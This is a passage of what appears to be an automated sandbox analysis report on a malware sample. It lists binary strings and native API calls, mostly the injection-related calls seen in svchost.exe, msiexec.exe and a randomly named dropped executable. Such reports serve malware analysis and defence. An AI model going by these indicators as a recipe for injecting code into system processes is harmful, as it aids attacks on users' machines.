            Source: 0XLuA614VK.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d35dd759-e
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B5A3 NtClose,2_2_0042B5A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,2_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04484650 NtSuspendThread,LdrInitializeThunk,4_2_04484650
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04484340 NtSetContextThread,LdrInitializeThunk,4_2_04484340
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482C60 NtCreateKey,LdrInitializeThunk,4_2_04482C60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04482C70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04482CA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04482D10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04482D30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482DD0 NtDelayExecution,LdrInitializeThunk,4_2_04482DD0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04482DF0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04482EE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482F30 NtCreateSection,LdrInitializeThunk,4_2_04482F30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482FE0 NtCreateFile,LdrInitializeThunk,4_2_04482FE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482FB0 NtResumeThread,LdrInitializeThunk,4_2_04482FB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482AD0 NtReadFile,LdrInitializeThunk,4_2_04482AD0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482AF0 NtWriteFile,LdrInitializeThunk,4_2_04482AF0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482B60 NtClose,LdrInitializeThunk,4_2_04482B60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044835C0 NtCreateMutant,LdrInitializeThunk,4_2_044835C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044839B0 NtGetContextThread,LdrInitializeThunk,4_2_044839B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482C00 NtQueryInformationProcess,4_2_04482C00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482CC0 NtQueryVirtualMemory,4_2_04482CC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482CF0 NtOpenProcess,4_2_04482CF0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482D00 NtSetInformationFile,4_2_04482D00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482DB0 NtEnumerateKey,4_2_04482DB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482E30 NtWriteVirtualMemory,4_2_04482E30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482E80 NtReadVirtualMemory,4_2_04482E80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482EA0 NtAdjustPrivilegesToken,4_2_04482EA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482F60 NtCreateProcessEx,4_2_04482F60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482F90 NtProtectVirtualMemory,4_2_04482F90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482FA0 NtQuerySection,4_2_04482FA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482AB0 NtWaitForSingleObject,4_2_04482AB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482BE0 NtQueryValueKey,4_2_04482BE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482BF0 NtAllocateVirtualMemory,4_2_04482BF0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482B80 NtQueryInformationFile,4_2_04482B80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04482BA0 NtEnumerateValueKey,4_2_04482BA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04483010 NtOpenDirectoryObject,4_2_04483010
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04483090 NtSetValueKey,4_2_04483090
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04483D70 NtOpenThread,4_2_04483D70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04483D10 NtOpenProcessToken,4_2_04483D10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00138060 NtDeleteFile,4_2_00138060
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001380F0 NtClose,4_2_001380F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00137E20 NtCreateFile,4_2_00137E20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00137F80 NtReadFile,4_2_00137F80
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00F8D5EB
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00F81201
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F8E8F6
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F280600_2_00F28060
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F920460_2_00F92046
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F882980_2_00F88298
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F5E4FF0_2_00F5E4FF
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F5676B0_2_00F5676B
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00FB48730_2_00FB4873
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F2CAF00_2_00F2CAF0
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F4CAA00_2_00F4CAA0
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F3CC390_2_00F3CC39
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F56DD90_2_00F56DD9
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F291C00_2_00F291C0
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F3B1190_2_00F3B119
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F413940_2_00F41394
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F417060_2_00F41706
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F4781B0_2_00F4781B
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F419B00_2_00F419B0
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F3997D0_2_00F3997D
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F279200_2_00F27920
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F47A4A0_2_00F47A4A
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F47CA70_2_00F47CA7
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F41C770_2_00F41C77
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F59EEE0_2_00F59EEE
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00FABE440_2_00FABE44
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F41F320_2_00F41F32
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_011635F00_2_011635F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041006A2_2_0041006A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100732_2_00410073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011202_2_00401120
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D9C32_2_0042D9C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004169E32_2_004169E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032102_2_00403210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102932_2_00410293
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3132_2_0040E313
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024B02_2_004024B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027702_2_00402770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA3522_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F02_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037003E62_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E02742_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C02C02_2_036C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C81582_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036301002_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA1182_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81CC2_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F41A22_2_036F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037001AA2_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D20002_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036407702_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A02_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428402_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_04206D303_2_04206D30
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_042264343_2_04226434
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_0420F4543_2_0420F454
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_04208D043_2_04208D04
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_04206D843_2_04206D84
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_04208AE43_2_04208AE4
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_04208ADB3_2_04208ADB
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_06A306EC3_2_06A306EC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_06A306F53_2_06A306F5
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_06A355353_2_06A35535
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_06A370653_2_06A37065
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_06A4E0453_2_06A4E045
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_06A2E9953_2_06A2E995
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 3_2_06A309153_2_06A30915
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045024464_2_04502446
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044FE4F64_2_044FE4F6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044505354_2_04450535
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045105914_2_04510591
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0446C6E04_2_0446C6E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044747504_2_04474750
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044507704_2_04450770
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0444C7C04_2_0444C7C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044E20004_2_044E2000
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044D81584_2_044D8158
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044401004_2_04440100
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044EA1184_2_044EA118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045081CC4_2_045081CC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045101AA4_2_045101AA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044F02744_2_044F0274
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044D02C04_2_044D02C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450A3524_2_0450A352
